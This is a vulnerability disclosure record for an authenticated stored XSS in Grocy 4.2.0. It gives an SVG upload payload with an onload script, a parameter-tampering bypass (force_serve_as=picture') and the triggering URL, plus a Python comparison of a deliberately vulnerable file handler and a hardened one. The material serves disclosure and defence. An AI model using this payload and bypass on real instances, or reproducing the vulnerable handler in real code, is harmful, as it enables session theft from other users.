| Field | Value |
|---|---|
| Title | Grocy 4.2.0 Authenticated Stored Cross-Site Scripting via Break of Control |
| Description | When authenticated, an operator can bypass the image validation mechanisms and upload a stored Cross-Site Scripting (XSS) payload into the application. This vulnerability allows the operator to steal other users' sessions by tricking them into clicking the stored link. |
| Source | https://github.com/grocy/grocy |
| User | Stux (UID 40142) |
| Submitted | 2024-08-31 08:26 PM (2 years ago) |
| Moderation | 2024-09-01 03:42 PM (19 hours later) |
| Status | Accepted |
| VulDB entry | 276274 [Grocy up to 4.2.0 SVG File Upload recipepictures force_serve_as Cross Site Scripting] |
| Points | 20 |

PoC:

1. Access the "Recipes" menu.
2. Add a new recipe by clicking "Add" and fill in the inputs with any values.
3. After adding, an "Edit recipe" page opens. On this page, under the "Picture" section, upload a file containing the following content:

```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg onload="alert(1)" xmlns="http://www.w3.org/2000/svg">
<defs><font id="x"><font-face font-family="y"/></font></defs>
</svg>
```

4. In the Burp history you will find a request like this after uploading the SVG file:

```
GET /api/files/recipepictures/(base64...)?force_serve_as=picture&best_fit_width=400
```

The response to this request is an error indicating that the image is not valid:

```
404 Not Found - {"error_message":"Unsupported image type"}
```

5. Change the `force_serve_as=picture` parameter to `force_serve_as=picture'`. The single quote breaks the parameter value, which bypasses the validation.
6. By copying and opening the URL `http://localhost:9283/api/files/recipepictures/(base64)?force_serve_as=picture'&best_fit_width=400`, you can trigger the stored Cross-Site Scripting (XSS).
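The bypass in the PoC works because an unexpected parameter value falls through the image check instead of being rejected. The following is an added example, not Grocy's code: it models that inferred pattern beside a hardened handler that allowlists the parameter, decides by file content rather than by parameter or extension, and never serves non-raster uploads inline. The serve modes, magic-byte table and sample payloads are constructed assumptions.

```python
from typing import Dict, Optional, Tuple

# Raster signatures we are willing to render inline (constructed allowlist).
RASTER_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"\xff\xd8\xff": "image/jpeg",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}
# Assumed serve modes; anything else is an error, not a fallthrough.
ALLOWED_SERVE_MODES = {"picture", "download"}

# Constructed samples: a benign SVG document and a minimal PNG header.
SVG_SAMPLE = b'<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg"></svg>'
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8


def sniff_raster_type(data: bytes) -> Optional[str]:
    """Return the MIME type if the bytes start with a known raster signature."""
    for magic, mime in RASTER_MAGIC.items():
        if data.startswith(magic):
            return mime
    return None


def serve_file_vulnerable(data: bytes, force_serve_as: str) -> Tuple[int, Dict[str, str]]:
    """Pattern inferred from the report: the check is tied to one literal value."""
    if force_serve_as == "picture" and sniff_raster_type(data) is None:
        return 404, {"error_message": "Unsupported image type"}
    # "picture'" skips the check; the file is served with a type guessed from
    # its bytes, so an SVG is rendered by the browser and its onload fires.
    guessed = "image/svg+xml" if b"<svg" in data[:512] else "application/octet-stream"
    return 200, {"Content-Type": guessed}


def serve_file_hardened(data: bytes, force_serve_as: str) -> Tuple[int, Dict[str, str]]:
    """Reject unknown modes, decide by content, never render uploads inline."""
    if force_serve_as not in ALLOWED_SERVE_MODES:
        return 400, {"error_message": "Invalid force_serve_as"}
    mime = sniff_raster_type(data)  # trust bytes, not the parameter or extension
    if force_serve_as == "picture":
        if mime is None:
            return 404, {"error_message": "Unsupported image type"}
        return 200, {"Content-Type": mime, "X-Content-Type-Options": "nosniff"}
    # Download mode: forced attachment, so SVG/HTML can never execute in-origin.
    return 200, {"Content-Type": "application/octet-stream",
                 "Content-Disposition": "attachment",
                 "X-Content-Type-Options": "nosniff"}
```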